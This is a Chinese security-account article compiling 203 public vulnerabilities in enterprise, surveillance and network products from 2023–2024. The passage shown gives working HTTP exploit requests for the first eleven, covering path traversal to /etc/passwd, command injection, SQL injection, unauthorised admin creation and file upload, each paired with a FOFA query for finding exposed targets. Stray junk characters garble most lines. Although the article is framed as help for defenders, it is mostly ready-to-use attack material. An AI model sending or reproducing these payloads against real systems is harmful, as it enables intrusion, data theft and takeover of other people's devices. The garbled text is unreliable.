互联网公开漏洞整理202309-202406
+ ]# ~( Q2 o) X道一安全 2024-06-05 07:41 北京
. t5 H& R& @' |以下文章来源于网络安全新视界 ,作者网络安全新视界* h- ^1 _5 k: m, K
. ^: o, j4 y6 F, y0 ^
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。9 o% D( E" t$ O9 \
' z9 n& G, K' W漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
5 a% V9 Q9 s/ \- u/ I9 K$ \
& S6 Z" d* W y, t% I安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。3 P0 y4 P+ l# q' M9 s
0 L5 n( M" }9 s! T$ ]% H
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
" k0 y" [9 u0 ~# U a; R* s- [4 @9 r7 p, B2 n, J8 u! y7 E5 ?
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
4 {: w0 s+ Q9 |
( a, c% G; {6 C9 W3 U5 }. Z# x
7 o( H4 U. ^% ]; Q* x2 x; z声明- ?9 s: G* `0 e! ~' e2 f/ h( g
% l( \8 p* G( B! f
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
, b1 v1 q- L. H) N& R; B9 j* {2 E
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
2 g2 Q5 O1 T9 g; f X. ~1 p
8 u+ c" Q; h3 C) i! X" X' [$ D2 w' h0 W
4 M, S1 Y/ O9 J1 |$ ]( A2 e目录& w x$ E& p, W+ b4 B8 p/ f# @
; Q% N A# ~7 ]- }/ [1 X! g01
" A7 Z2 a" C, O8 x+ j% Z% d4 c
. D+ t/ T4 \/ @" q! ~( ^1. StarRocks MPP数据库未授权访问; g4 ~3 L& R: ^ C
2. Casdoor系统static任意文件读取
6 V% t; c3 Y- J. R5 e2 U4 I3. EasyCVR智能边缘网关 userlist 信息泄漏
/ y( \- y; K0 V. M4. EasyCVR视频管理平台存在任意用户添加
D/ X% ~" D* B+ R5. NUUO NVR 视频存储管理设备远程命令执行6 H+ |8 G7 v; ?: s( c3 ?
6. 深信服 NGAF 任意文件读取
' L8 c) n( ^' ~# r7. 鸿运主动安全监控云平台任意文件下载
9 C; }5 E# [0 j; Z8. 斐讯 Phicomm 路由器RCE5 v9 A0 O, `6 b. }# q
9. 稻壳CMS keyword 未授权SQL注入
8 X; B( _8 b; I; W+ R$ |) `' Z: n10. 蓝凌EIS智慧协同平台api.aspx任意文件上传5 u& ~) c/ @# d6 \, j- W
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
/ J& \* E% b6 }12. Jorani < 1.0.2 远程命令执行
% f9 m0 i7 U" a, [+ z/ b# Y13. 红帆iOffice ioFileDown任意文件读取2 G+ J1 M1 \, [0 W8 p* X) g9 r7 Y
14. 华夏ERP(jshERP)敏感信息泄露
8 i" ?) z( D: V6 H+ l" s15. 华夏ERP getAllList信息泄露
; |4 {2 n) v/ R0 {; `16. 红帆HFOffice医微云SQL注入
, j3 h* O1 c% v6 J3 O; _3 \, p17. 大华 DSS itcBulletin SQL 注入& j# q ?: Q. k. O; w6 Q
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 D( J' z2 s' o# h9 L19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入, W, Z7 s. e$ }8 ~ r( ?
20. 大华ICC智能物联综合管理平台任意文件读取2 y. A$ j0 s; U: h
21. 大华ICC智能物联综合管理平台random远程代码执行
3 |. R4 }5 G. z( E6 @# c5 D22. 大华ICC智能物联综合管理平台 log4j远程代码执行$ g9 h: B) Z1 q' s
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 b0 x) s `) d" e+ k9 \0 I
24. 用友NC 6.5 accept.jsp任意文件上传
% E; D O& f" H* C25. 用友NC registerServlet JNDI 远程代码执行+ F) U0 z0 ^ X& q
26. 用友NC linkVoucher SQL注入+ Y- }# m) r$ `* V& i& H
27. 用友 NC showcontent SQL注入
! Y( t! a P) Q28. 用友NC grouptemplet 任意文件上传
% h- P5 K0 G9 ] z8 |7 p/ |1 S2 M29. 用友NC down/bill SQL注入
0 G N7 S1 g' X( g30. 用友NC importPml SQL注入" |5 X. Q6 P9 `- n$ Z4 q4 e
31. 用友NC runStateServlet SQL注入
2 S+ t2 @' _* _' R l32. 用友NC complainbilldetail SQL注入
, D4 ]* E# W) r1 B* ~- x* b33. 用友NC downTax/download SQL注入* n9 U) P5 p6 j4 p( Y8 _& B# d& S
34. 用友NC warningDetailInfo接口SQL注入3 u3 A" w; W) ^1 F9 l
35. 用友NC-Cloud importhttpscer任意文件上传0 B: |9 w. x& @) h
36. 用友NC-Cloud soapFormat XXE
# ]+ e7 |; J: n+ I/ C- o. w37. 用友NC-Cloud IUpdateService XXE
* K. K p( K: A& B# r' r7 k$ b38. 用友U8 Cloud smartweb2.RPC.d XXE, t/ U( ^* H1 j& k% C* L
39. 用友U8 Cloud RegisterServlet SQL注入! x" n9 T m9 f8 |" B! m4 h
40. 用友U8-Cloud XChangeServlet XXE% u' A) w# U8 L
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
; `0 z: E# N4 e) ?0 c# C N42. 用友GRP-U8 SmartUpload01 文件上传 {! W. E- a& T3 h# d
43. 用友GRP-U8 userInfoWeb SQL注入致RCE. k$ E8 K! K+ F- n( I& E+ w, }) ?1 K
44. 用友GRP-U8 bx_dj_check.jsp SQL注入0 \$ }, |& Q" y
45. 用友GRP-U8 ufgovbank XXE6 l, G- Q5 P" N+ k% B" _
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
4 Z/ b. J0 d4 n4 |47. 用友GRP A++Cloud 政府财务云 任意文件读取
! O1 f) z6 D. e9 O& m5 ?9 v& {48. 用友U8 CRM swfupload 任意文件上传
, u- c5 W9 r* q" ^& N49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 {( s4 ^1 l0 v- U' g50. QDocs Smart School 6.4.1 filterRecords SQL注入
1 G2 Q3 [7 e1 D51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% O) Q" G) i! U' n3 \' k* L
52. 泛微E-Office json_common.php sql注入
0 n" l# n. X8 S, y, L" n+ w+ e& B53. 迪普 DPTech VPN Service 任意文件上传3 A9 A- b* g) o" i0 v9 g
54. 畅捷通T+ getstorewarehousebystore 远程代码执行! y7 z8 @" k1 s' K* w/ B- o
55. 畅捷通T+ getdecallusers信息泄露
# o3 J0 x& c9 b! P8 l( v56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 w( B% c' m3 R |' ?
57. 畅捷通T+ keyEdit.aspx SQL注入
0 {9 \( ^# _4 ]+ r% u58. 畅捷通T+ KeyInfoList.aspx sql注入5 C( }, M+ [- D6 o U
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! N" y/ {2 Z% [! L60. 百卓Smart管理平台 importexport.php SQL注入: ^8 W9 W" o9 {
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
2 J7 T! j7 z3 `- g0 ^& b! e62. IP-guard WebServer 远程命令执行4 @7 q3 Z. {! R& X1 s- p
63. IP-guard WebServer任意文件读取3 e2 l7 |4 ~# Y2 j( w
64. 捷诚管理信息系统CWSFinanceCommon SQL注入( k, Z1 g& p, V% l1 H
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
% l6 q4 n7 I4 `* U3 \ m66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 t; k. ]' `: X( z5 H
67. 万户ezOFFICE wpsservlet任意文件上传
' y W$ O- E ^1 G; F9 e68. 万户ezOFFICE wf_printnum.jsp SQL注入6 }% E' L$ P- p, \9 A
69. 万户 ezOFFICE contract_gd.jsp SQL注入
0 Y- Z! S/ v9 O3 Y70. 万户ezEIP success 命令执行$ T- c3 H& A$ `
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入& u: Q3 L4 L9 W; t8 X; k
72. 致远OA getAjaxDataServlet XXE
0 z8 S7 [5 i5 N) T4 W+ w& X4 I/ {2 y+ c73. GeoServer wms远程代码执行* a% J% K2 w& c( O" [# W2 E
74. 致远M3-server 6_1sp1 反序列化RCE
2 K5 M+ h9 @1 D75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 O0 U% t+ M; x$ o* c
76. 新开普掌上校园服务管理平台service.action远程命令执行8 \) |! ~7 e: O1 P6 v9 D$ q$ L
77. F22服装管理软件系统UploadHandler.ashx任意文件上传 u' V2 g/ y7 n5 I9 B; s
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传6 T9 I2 B C+ i& p
79. BYTEVALUE 百为流控路由器远程命令执行9 b& q% ^" G+ F/ N: ?+ W
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 T. n; m- ]; w3 [
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% V( u9 S9 l, W( h* |7 ^82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行+ e$ g3 P2 h3 c. L B
83. JeecgBoot testConnection 远程命令执行. y+ M# i2 A, v6 w) ~$ D' N e: W
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 B+ k/ [/ g, @! j
85. SysAid On-premise< 23.3.36远程代码执行+ w& S+ @/ ?* e1 _4 t5 P
86. 日本tosei自助洗衣机RCE5 ~" s8 d; p4 _) c/ y( r
87. 安恒明御安全网关aaa_local_web_preview文件上传
4 I$ R l- F) M' G2 K88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 M$ Y+ ]$ g/ b% }
89. 致远互联FE协作办公平台editflow_manager存在sql注入+ I& a- x k( e7 q
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& p7 \ H2 P, p9 V
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
}4 m; n- Y/ H& {6 @92. 海康威视运行管理中心session命令执行
7 J' g- `3 Q0 [' r2 \93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
% N: ^/ _7 a0 I94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
3 J$ a: G: g& m9 ?95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行. h, {4 v2 R. T
96. Apache OFBiz 18.12.11 groovy 远程代码执行1 l7 ^5 R6 g$ c% s. S0 `
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ V6 w# h2 E% w9 U$ H* F- e
98. SpiderFlow爬虫平台远程命令执行9 I! H5 m2 G: ?- ?5 O
99. Ncast盈可视高清智能录播系统busiFacade RCE
6 t4 i/ B$ X" q- S2 ^100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
f# L8 T" n' _0 r$ B101. ivanti policy secure-22.6命令注入0 \$ M- ~3 @- q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
, H5 H# k" l9 V7 R o" ]! u, ^103. Ivanti Pulse Connect Secure VPN XXE2 |' G* h$ p, {" g- B# Z3 I
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
3 V' I, h8 U# V' L1 X4 _+ O( U7 T105. SpringBlade v3.2.0 export-user SQL 注入
. d: D+ O: O! p @106. SpringBlade dict-biz/list SQL 注入( T0 {6 B& u9 u; T! p2 B* b
107. SpringBlade tenant/list SQL 注入
# y9 \" d$ S. a' u8 \3 E108. D-Tale 3.9.0 SSRF7 o; }0 }9 [8 ]2 K E5 C! g0 I
109. Jenkins CLI 任意文件读取( o* _! ]5 a2 T/ n
110. Goanywhere MFT 未授权创建管理员7 R! g0 I# Z9 s5 u
111. WordPress Plugin HTML5 Video Player SQL注入
- C1 ]/ P6 }8 Y+ x112. WordPress Plugin NotificationX SQL 注入3 c, e: p$ g- R, u- J
113. WordPress Automatic 插件任意文件下载和SSRF- M8 @4 D5 D, O
114. WordPress MasterStudy LMS插件 SQL注入! E3 r+ t z- }9 O3 |
115. WordPress Bricks Builder <= 1.9.6 RCE4 G9 b0 a! n3 Y! P M7 N0 {5 z
116. wordpress js-support-ticket文件上传8 G8 Y2 s! G* r
117. WordPress LayerSlider插件SQL注入$ b/ H% z* i- A5 C; ^# K
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传/ |) G" E8 S( }# |! L- [
119. 北京百绰智能S20后台sysmanageajax.php sql注入
6 o6 [2 z3 ?5 X6 s120. 北京百绰智能S40管理平台导入web.php任意文件上传. W. x h. }8 F' M0 r0 U
121. 北京百绰智能S42管理平台userattestation.php任意文件上传: K9 y6 T4 H# i# C( b' p1 z
122. 北京百绰智能s200管理平台/importexport.php sql注入1 s- J r s/ ^- a" e6 w
123. Atlassian Confluence 模板注入代码执行
\4 S3 X% F/ z' P6 q4 P1 V124. 湖南建研工程质量检测系统任意文件上传
2 J: G" t) V" N. H125. ConnectWise ScreenConnect身份验证绕过: h$ l3 j1 Z8 \% p9 c
126. Aiohttp 路径遍历$ n1 D$ w4 b$ ]2 L5 y; u
127. 广联达Linkworks DataExchange.ashx XXE& k( W1 z/ T6 s' O! G) Q
128. Adobe ColdFusion 反序列化
" Y' R+ l( c6 T0 _1 a( H129. Adobe ColdFusion 任意文件读取- p4 a. `6 B/ l# @
130. Laykefu客服系统任意文件上传4 N( U% l4 K1 r1 E0 B* w! @; s) k
131. Mini-Tmall <=20231017 SQL注入. i! q. @0 G$ |! K( |/ I$ F
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
/ E" M2 T( u9 U! | Q133. H5 云商城 file.php 文件上传
7 v+ A6 |2 ? k- `134. 网康NS-ASG应用安全网关index.php sql注入
$ n) }8 O Z; i2 Z, O! k135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
' H3 b0 {8 B/ Z2 l136. NextChat cors SSRF
% ?" b- M8 `+ r137. 福建科立迅通信指挥调度平台down_file.php sql注入$ ~( @1 Q8 [% U. H6 b
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 j+ r9 N* M& Y0 A9 g6 \
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
- h8 h3 [0 E% k/ q6 H, Y9 U140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* x" n6 r m. j5 B141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
5 @- p" j% S- m8 a) g' B* Q142. CMSV6车辆监控平台系统中存在弱密码) Z0 |( Q0 p; c/ g
143. Netis WF2780 v2.1.40144 远程命令执行
- @" u+ B$ G% z* e" D3 z# i144. D-Link nas_sharing.cgi 命令注入6 L8 X2 C/ t) h/ z
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, M: Q' c7 j) T! l4 U
146. MajorDoMo thumb.php 未授权远程代码执行0 Y7 O) p C! J7 `7 `& _/ x. z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
1 I! G5 d h# ?( {% n148. CrushFTP 认证绕过模板注入6 S& M \! Y& U, |
149. AJ-Report开源数据大屏存在远程命令执行
5 D+ n2 j" T' Y# e+ I0 W150. AJ-Report 1.4.0 认证绕过与远程代码执行2 c* p. R; B9 f/ r0 q
151. AJ-Report 1.4.1 pageList sql注入& v, L- {0 Y7 J+ C% W3 \
152. Progress Kemp LoadMaster 远程命令执行6 x" N/ r v' ?+ a% V3 \, a
153. gradio任意文件读取
* K: u0 z; b$ I154. 天维尔消防救援作战调度平台 SQL注入
Z" K& k, r0 m/ e" k155. 六零导航页 file.php 任意文件上传
% Y* d k& v" J- f' x0 t156. TBK DVR-4104/DVR-4216 操作系统命令注入
6 H& D) R- q/ B$ b" N4 `$ E2 k& J4 k157. 美特CRM upload.jsp 任意文件上传! ^* ]' [' B* e+ S+ {, b: J
158. Mura-CMS-processAsyncObject存在SQL注入
5 u5 K! N9 Z7 V$ t# D$ S159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
+ L/ f9 D# a3 G9 D1 M3 u160. Sonatype Nexus Repository 3目录遍历与文件读取
- N1 s* d6 p5 G, Y; }161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. r8 v2 v! Q8 y, H/ s, D& z; P- b- z- o, }
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传; y' |, d9 b7 W$ k7 D+ I& z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; R8 I: {) `& e* `& f* `
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传: v% u8 j: I5 R* D) j% J
165. OrangeHRM 3.3.3 SQL 注入8 k3 r# c' D8 ?
166. 中成科信票务管理平台SeatMapHandler SQL注入
' N* a. B* s! w3 `6 F8 ^% p167. 精益价值管理系统 DownLoad.aspx任意文件读取" Y3 }" x. {0 c8 s: }
168. 宏景EHR OutputCode 任意文件读取
: h! D0 Y5 k/ T5 K; U- `7 [, w( c169. 宏景EHR downlawbase SQL注入
# C; M9 s3 v; V' z170. 宏景EHR DisplayExcelCustomReport 任意文件读取2 O( H$ t0 V' s8 S
171. 通天星CMSV6车载定位监控平台 SQL注入. f$ Z. k/ D& a3 s K8 E
172. DT-高清车牌识别摄像机任意文件读取
/ }$ ` B% z4 B+ [7 L173. Check Point 安全网关任意文件读取( T9 {; n* i8 H' N/ u
174. 金和OA C6 FileDownLoad.aspx 任意文件读取: N9 n/ E$ A3 j( c$ H2 K; g- o
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入' { M* Z- m! m+ _' Z
176. 电信网关配置管理系统 rewrite.php 文件上传9 k. D% g" q% j1 Z c# T# g
177. H3C路由器敏感信息泄露3 E/ x3 E8 S/ `: k/ W$ ^
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 d: D: d) w$ @: T# s179. 建文工程管理系统存在任意文件读取
s0 A4 J7 k2 d180. 帮管客 CRM jiliyu SQL注入
# x5 S4 w; I. S2 I0 [, }( Q5 a181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 Z" i# x( s' e B, C3 |
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建& n2 Z6 n$ s3 f8 u8 m
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
5 v/ W3 e8 Y9 i2 `+ H7 j, M184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% t" r8 a [2 O3 o7 m
185. 瑞友天翼应用虚拟化系统SQL注入
7 [4 i- Z$ N' E/ x* q186. F-logic DataCube3 SQL注入9 Q# c) J5 n" j0 g1 h+ x
187. Mura CMS processAsyncObject SQL注入& ~$ M7 d+ A" z0 J1 d% p* w1 [
188. 叁体-佳会视频会议 attachment 任意文件读取/ a0 _2 ~+ J5 K
189. 蓝网科技临床浏览系统 deleteStudy SQL注入! S/ `7 _# D% d- X/ s" V
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
. i4 i! ]7 I0 K2 `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
+ n# ?; c) Y0 h8 f! j1 N192. 富通天下外贸ERP UploadEmailAttr 任意文件上传; i5 B/ K9 n0 n
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行+ k2 D6 R5 x: y' w F6 y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% k+ r% M+ G. \8 g195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
. U4 D8 u/ L+ F' |* V9 @8 z196. 河南省风速科技统一认证平台密码重置
4 H2 R/ X# r* ?197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入# ^+ A# j6 I/ X5 Y, S
198. 阿里云盘 WebDAV 命令注入
3 X5 a) {% T$ L199. cockpit系统assetsmanager_upload接口 文件上传
- E2 T9 r" S* O200. SeaCMS海洋影视管理系统dmku SQL注入! g$ |& E" y5 W+ T, D2 n
201. 方正全媒体新闻采编系统 binary SQL注入( E# W C6 N! o- N3 f# `
202. 微擎系统 AccountEdit任意文件上传6 e3 y: o- ]- m6 [% s+ z
203. 红海云EHR PtFjk 文件上传0 y, Q$ [1 w- B7 w/ @
: i" S/ w8 C2 j$ o' [
POC列表2 U5 h) B/ \% B6 k
1 s* O- a" Q, P4 L02# x) d# S. R1 ]4 V- o- X2 v
- o- Q7 Q# U) w3 }* `/ r! ^ M% L; W1. StarRocks MPP数据库未授权访问3 P: N; G0 F( E* z1 A8 d
FOFA :title="StarRocks"
4 B- M' k. v& Q& L6 P$ eGET /mem_tracker HTTP/1.1
7 q2 p1 I; a- R# p' |Host: URL+ G' g" K4 K H. F! V6 }( k. g; K% ~8 X
5 ^' F' a" {/ j! j
" f: ~1 J; g3 ]/ i5 Z1 |2. Casdoor系统static任意文件读取
; A8 r+ z2 s; t* dFOFA :title="Casdoor"
" y+ f, V( [0 d) G, BGET /static/../../../../../../../../../../../etc/passwd HTTP/1.15 l# `* W+ E8 p# x9 e8 m* V6 R) h+ h2 o
Host: xx.xx.xx.xx:9999" V& ]' l8 H$ q% n8 J% @" f' B4 j% K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) E7 B. k+ I: k+ g( Z0 n
Connection: close; L+ p) w: |6 |6 C/ C5 @
Accept: */*& v2 t6 h3 i& z& H8 u- u$ W6 e
Accept-Language: en+ d; l$ M! N8 m/ u# [9 }
Accept-Encoding: gzip
& \0 e. [; `: U {1 _9 x% A S+ {% Y2 \6 ?# W; c }
" M# D1 o8 O' }& ]) b( ?3. EasyCVR智能边缘网关 userlist 信息泄漏! [/ G; U. O- e9 ?
FOFA :title="EasyCVR"' c3 X- B1 v; ?, B
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1' j8 n% c% |( ^
Host: xx.xx.xx.xx
* Z$ z1 f' w3 G. I
' B, H) I. j' z9 i
5 n# J: w/ ?0 H# O* Q+ c3 H; l4. EasyCVR视频管理平台存在任意用户添加
# _. t5 w, N2 e7 W$ x6 qFOFA :title="EasyCVR"
/ W8 _; x6 q: j6 b$ X
* I: M! t+ p! xpassword更改为自己的密码md5, H7 f! R$ e. R
POST /api/v1/adduser HTTP/1.1
2 g. Z/ x: n& yHost: your-ip
5 q8 e4 B9 D9 r/ s5 n2 z* c4 R) w! D1 IContent-Type: application/x-www-form-urlencoded; charset=UTF-8
5 w% [8 Q; K) Q/ G
- r3 A9 P3 `+ x: Wname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
8 f6 J; I" J) e( Q$ B
( |, w- k, j; _/ K
4 [- A" W5 q5 P; l# U2 _5. NUUO NVR 视频存储管理设备远程命令执行
: Z1 W! f5 f& U/ F) h: Y) u, nFOFA:title="Network Video Recorder Login" U* q. _$ `* R
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
2 X1 |4 M2 S+ lHost: xx.xx.xx.xx
; E0 f8 G6 _8 u P
# w( t0 R3 m/ |% h/ l8 z( V8 z6 o9 R ]0 B) N
6. 深信服 NGAF 任意文件读取
- v- P- I5 ]4 w* }! e' I1 ^FOFA:title="SANGFOR | NGAF"
" s) ?' r4 |2 eGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
- B% c; O9 U3 { a/ t& P% h9 N& SHost:* B, J: D8 |9 B1 K
5 v5 w( J# l& |+ M8 k
) \1 n d' M; e0 k) h9 m, I
7. 鸿运主动安全监控云平台任意文件下载
9 P/ {! x( T7 d$ SFOFA:body="./open/webApi.html"
; r2 Z9 L6 @( L7 o6 JGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
1 K- |3 H H. w: @+ t% JHost:. H6 B9 W& U$ [+ W+ }3 f& S( ~
1 c4 l5 ?) _; F4 k6 V
1 a/ g; m) M; @5 G. r. e8. 斐讯 Phicomm 路由器RCE
$ k [& W/ W. y3 d8 rFOFA:icon_hash="-1344736688"9 V3 ?& F+ [5 l
默认账号admin登录后台后,执行操作5 `, x& W5 }5 u3 c- B% c: x
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1* U! p+ G* I7 Z2 W; F, @- l
Host: x.x.x.x+ k$ p5 G8 i) v+ u+ N& T. g
Cookie: sysauth=第一步登录获取的cookie& V: l- W0 o" S% T6 R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz& i7 ]) v- A* v: p5 M1 W, R
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 Z) ]: y1 |$ U1 [1 ?) N# F2 W% r6 u! D0 B
------WebKitFormBoundaryxbgjoytz) j% g& D0 k7 N8 Z+ ^. N
Content-Disposition: form-data; name="wifiRebootEnablestatus"
" u8 |* `$ q- U- @" I
. R& N- M7 k5 ]3 n5 ~/ P%s
/ M& T" Z1 c: X; T3 s& _5 u7 W------WebKitFormBoundaryxbgjoytz
: b3 e1 E' \1 O! m) x T% g0 K% WContent-Disposition: form-data; name="wifiRebootrange": { p, v& o; f$ b4 R) t2 y
7 Z R( K* `: F7 d1 H8 [% R4 a12:00; id;9 z" V! |( I4 }2 c; }9 O4 B y0 b+ s. t
------WebKitFormBoundaryxbgjoytz
- o0 O- y. X& z- vContent-Disposition: form-data; name="wifiRebootendrange"
. Q; y/ f! d8 ] s2 x
3 Y0 A0 |: ^9 q- K6 K%s:
# }( u* ^) c/ S! p" [! j+ Z------WebKitFormBoundaryxbgjoytz
4 R b* g% ~8 NContent-Disposition: form-data; name="cururl2"
7 S% }) d8 V' H# F2 `- v' q7 |* P ]! b) U9 g
' k3 c* J8 |5 V' K
------WebKitFormBoundaryxbgjoytz--" s+ w& y/ w. a% H6 V
# E1 [5 M. o" W, r8 n3 U3 W& h
! ~* I( t+ _7 M7 F: r; y2 J9. 稻壳CMS keyword 未授权SQL注入# q( u4 e9 k+ E g5 _6 ]2 E, O
FOFA:app="Doccms"
% [& G! T/ [+ O+ ]; ]4 yGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1( f9 l# s9 K2 s$ O- y/ L
Host: x.x.x.x
2 R3 L3 u, O& `) _3 m j) {. B* M$ m' P7 Q: u: o' X
) z; g; Y+ ^$ i& {payload为下列语句的二次Url编码) R" {+ _$ O5 m/ R
, M! c2 k: E% n9 C2 F' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
# V* j9 V; V/ X0 j' u6 r$ h* ^9 [7 @( y5 |1 o
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' T8 m8 a4 F+ Y9 W: T
FOFA:icon_hash="953405444"
* b" x5 ^, D% O Q% i! K5 E( g. U4 Z( ~ {
文件上传后响应中包含上传文件的路径' m# m; q: C5 o. I- N3 J1 b
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
; X3 B2 T7 P4 }Host: x.x.x.x:xx
, A0 s3 K+ ^; K5 N; ?. S6 X' M1 h4 ]) ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ J# U c/ g" D/ j& ?9 d7 K( e8 gContent-Length: 197/ V- q6 n; _# P1 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 z& z; a t6 r' Y/ N" K
Accept-Encoding: gzip, deflate! T# T- R0 k+ B4 _
Accept-Language: zh-CN,zh;q=0.9$ W* y2 S! A; b4 w: {1 {
Connection: close
( m5 [ h& v7 W$ J0 kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
* J$ |+ c& q- H* N; G& ~; P0 I# `+ O
5 [2 `# @0 g r' `7 L------WebKitFormBoundaryxdgaqmqu
! L+ s, [' N- d) p9 X" `Content-Disposition: form-data; name="file"filename="icfitnya.txt"% G0 _; P" h! F4 |5 [& J* Y' q
Content-Type: text/html$ M1 n4 V. ~8 g0 g8 b% `
( c6 }7 u0 l+ r; t& Djmnqjfdsupxgfidopeixbgsxbf' P6 }3 F R, _3 i
------WebKitFormBoundaryxdgaqmqu--) d' k$ ]4 [; G
% j! u' D. H% y" X) @
. B/ J L: L* O2 }" p11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: o$ ~" v H5 @! E/ B. ^
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"0 B# T+ b, [7 @2 [% p
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
/ l4 Y) l1 @9 e5 r8 lHost: 127.0.0.1
5 z. `& H9 `. c) i8 \Pragma: no-cache
" g: X' K9 g7 z2 NCache-Control: no-cache D$ D0 ~3 i$ p9 A0 X5 \# _+ F5 g0 `
Upgrade-Insecure-Requests: 1
